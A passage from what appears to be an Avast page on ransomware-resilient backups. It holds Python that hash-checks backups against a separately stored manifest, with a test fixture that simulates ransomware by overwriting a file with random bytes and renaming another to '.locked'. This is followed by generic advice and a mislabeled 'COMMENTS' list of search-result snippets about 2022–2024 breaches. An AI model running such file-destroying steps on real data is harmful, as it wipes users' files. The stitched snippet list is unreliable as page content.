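        with open(os.path.join(docs, "todo.txt"), "w") as f:
            f.write("renew backups\n" * 20)
        # The manifest lives in a separate location (the "vault"), so that
        # whatever damages the tree cannot also rewrite the record of it.
        manifest_path = os.path.join(vault, "manifest.json")
        save_manifest(build_manifest(root), manifest_path)
        before = verify_manifest(root, load_manifest(manifest_path))
        # Test fixture: overwrite one file with random bytes and rename another.
        with open(os.path.join(docs, "notes.txt"), "wb") as f:
            f.write(os.urandom(4096))
        os.rename(os.path.join(docs, "todo.txt"), os.path.join(docs, "todo.txt.locked"))
        after = verify_manifest(root, load_manifest(manifest_path))
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

Run the manifest build against each backup as it is taken and the verification before every restore; a backup that fails the check, or that carries files the entropy test flags, is not the copy to restore from. The entropy test is a heuristic only: compressed or media files are excluded because they are high-entropy by nature, and a file encrypted with a weak scheme may not score high at all, so the hash comparison remains the authoritative check.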

Protecting against ransomware

Ransomware is a growing threat that requires our constant attention and vigilance. By staying informed and taking proactive steps to protect your data, you can reduce the risk of falling victim to these attacks. Remember, the best defense is always a good offense—stay alert, stay updated, and stay safe.

1988 - 2024 Copyright © Avast Software s.r.o.

COMMENTS

  1. Top Cyberattacks of 2022: Lessons Learned

    For over a decade, I have analyzed the root causes, trends and patterns from what post-breach management specialists like to call unauthorized third parties performing really sophisticated cyberattacks. In the past, these cyberattacks were rarely "sophisticated" - and "unauthorized third parties" almost always meant cybercriminals. 2022 was different because infamy, that quality of ...

  2. The Worst Hacks and Breaches of 2022 So Far

    Whether the first six months of 2022 have felt interminable or fleeting—or both—massive hacks, data breaches, digital scams, and ransomware attacks continued apace throughout the first half of ...

  3. The biggest data breaches and leaks of 2022

    Twitter confirms data from 5.4 million accounts was stolen. In July 2022, a hacker that went by the alias 'devil' posted on hacking forum BreachForums that they had the data of 5.4 million Twitter accounts for sale. The stolen data included email addresses and phone numbers from "celebrities, companies, randoms, OGs".

  4. The biggest cyber attacks of 2022

    The biggest cyber attacks of 2022. Patrick O'Connor, CISSP, CEH, MBCS takes a look at significant security incidents in 2022 so far: some new enemies, some new weaknesses but mostly the usual suspects. In a year of global inflation and massive rises in energy costs, it should come as no surprise that the cost of a data breach has also reached ...

  5. Uber Investigating Breach of Its Computer Systems

    By Kate Conger and Kevin Roose. Sept. 15, 2022. Uber discovered its computer network had been breached on Thursday, leading the company to take several of its internal communications and ...

  6. Case Study: Viasat Attack

    On February 24th, 2022, the day of Russia's invasion into Ukraine, a cyberattack disrupted broadband satellite internet access. This attack disabled modems that communicate with Viasat Inc's KA-SAT satellite network, which supplies internet access to tens of thousands of people in Ukraine and Europe. Researchers from SentinelLabs believe that ...

  7. Top 10 cyber crime stories of 2022

    6. Uber suffers major cyber attack. Ride-sharing service Uber was one of 2022's high-profile cyber attack victims in September, when it suffered a supposed social engineering attack on an ...

  8. The 13 Costliest Cyberattacks of 2022

    2. October 2022: Medibank. A costly attack on health insurer Medibank affected all of its 3.9 million current and former customers. Attackers demanded a ransom payment of $9.7 million not to ...

  9. Cyber Threats 2022: A Year in Retrospect

    And in 2022, public and private sectors joining forces and sharing their intelligence bolstered organisations' defences. Our report "Cyber Threats 2022: A Year in Retrospect" examines the threat actors, trends, tools and motivations that captured the cyber threat landscape last year. It includes incident response case studies with direct ...

  10. Cyberattacks against governments jumped 95% in last half of 2022

    The number of attacks targeting the government sector increased by 95% worldwide in the second half of 2022 compared to the same period in 2021, according to a new report by AI-based cybersecurity ...

  11. Recent Cyber Attacks

    Recent Cyber Attacks from 2023. Under normal business circumstances, cyber attacks are an ever-increasing problem causing trillions of dollars in losses. To make matters worse, the war between Russia and Ukraine exacerbated these problems with a flurry of major politically-motivated cyber attacks in 2022. Here are some of the recent cyber attacks.

  12. U.S. Department of Justice Disrupts Hive Ransomware Variant

    Since late July 2022, the FBI has penetrated Hive's computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Since infiltrating Hive's network in July 2022, the FBI has provided over 300 decryption keys to Hive victims who were under attack.

  13. PDF 14 CYBER SECURITY PREDICTIONS FOR 2022 AND BEYOND

    This year's report, 14 Cyber Security Predictions for 2022 and Beyond, features more than a dozen insights from our leaders and foremost experts located all around the globe, including ... Charles Carmakal, SVP and Chief Technology Officer ...

  14. Cisco Talos shares insights related to recent cyber attack on Cisco

    Executive summary. On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate. During the investigation, it was determined that a Cisco employee's credentials were compromised after an attacker gained control of a personal Google ...

  15. What Caused the Uber Data Breach in 2022?

    Free trial. The Uber data breach began with a hacker purchasing stolen credentials belonging to an Uber employee from a dark web marketplace. An initial attempt to connect to Uber's network with these credentials failed because the account was protected with MFA. To overcome this security obstacle, the hacker contacted the Uber employee via ...

  16. How a Group of Israel-Linked Hackers Has Pushed the Limits of ...

    About eight minutes after 3 am on June 27, 2022, inside the Khouzestan steel mill near Iran's western coastline on the Persian Gulf, a massive lid lowered onto a vat of glowing, molten metal.

  17. 5 Major Ransomware Attacks of 2022

    3. Bernalillo County, New Mexico: This was one of the first big attacks in 2022. On January 5, the largest county in New Mexico discovered that it had become the victim of a paralysing ransomware attack, taking several county departments and government offices offline. The county officials, however, said that they made no ransom payment to the ...

  18. Recent Cyber Attacks, Data Breaches & Ransomware Attacks: August 2022

    A list of cyber incidents that occurred across the world in August 2022, with prevention and response strategies. The incidents include phishing, hacking, data exposure, ransomware, insider threat and vulnerabilities.

  19. The Devastating Business Impacts of a Cyber Breach

    Anton Petrus/Getty Images. Summary. Cybersecurity risks are becoming more systematic and more severe. Although the short-term impacts of a cyberattack on a business are quite severe, the long-term ...

  20. Uber Cyber-Attack: A Live Timeline

    16th September 2022: After Uber took its internal software tools offline due to the cyber attack, it gradually started bringing them online. In a statement, the company stated: "Internal software tools that we took down as a precaution yesterday are coming back online this morning."

  21. Top Cyber Attacks of 2022

    Taking a Look at Uber, Optus, Rockstar Games, and Other Major Cybersecurity Events. 2022 was an all-around rollercoaster, and it was no different in the world of cybersecurity. Some of the biggest cyber attacks in recent memory occurred this year, as threat actors got slicker and their methods more sophisticated.

  22. Uber Data Breach: What To Know About the 2022 Cybersecurity Attack

    No matter how robust network security is, even the biggest companies fall victim to cyber attacks. These malicious attacks can be costly — to the tune of 4.3 million on average — but they also disrupt operations and hurt a company's reputation. In fact, it is anticipated that cybercrime will cost the world $10.5 trillion annually by 2025. A recent breach at Uber reminds us of how social ...

  23. Hotel Industry Cyber Update

    Hospitality companies also retain employee data, trade secrets and suppliers' bank information. 1 This data makes hotels a valuable target for cybercriminals. Ponemon and IBM Security's 2022 global case study report 2 revealed that $2.94 million was the average total cost of a data breach in the hospitality industry from 2021 to 2022.

  24. Report: Attacks Surge With Critical Infrastructure Under Siege

    KnowBe4, a leading provider of security awareness training and simulated phishing, recently released its latest report, Cyber Attacks On Infrastructure: The New Geopolitical Weapon. The report examines the growing threat of cyberattacks on critical infrastructure and provides insight into safeguarding against these potentially devastating attacks.

  25. Cyber threats that shaped the first half of 2024

    Technology - Researchers found a 12.75% decrease (from H1 2023) in database leaks and ransomware attacks targeting technology companies. "The first half of 2024 has painted a concerning ...

  26. Next-Generation Attacks, Same Targets

    The gig economy meets the next generation of cyber attacks. New attacks require new defense strategies. Phishing-Resistant MFA Adoption is critical and no longer a nice to have. With phishing attacks as the top cyber threat for enterprises, legacy MFA is being proven increasingly inadequate as the numbers of victims substantiate.

  27. Ransomware attacks continue to increase in the US, UK, and Canada

    That's the reality of a ransomware attack—and paying the ransom doesn't guarantee you'll get your data back. In many cases, victims who pay the ransom never receive the promised decryption key. The rise of ransomware in 2024. Ransomware attacks are on the rise, with a notable 24% increase in the second quarter of 2024 alone.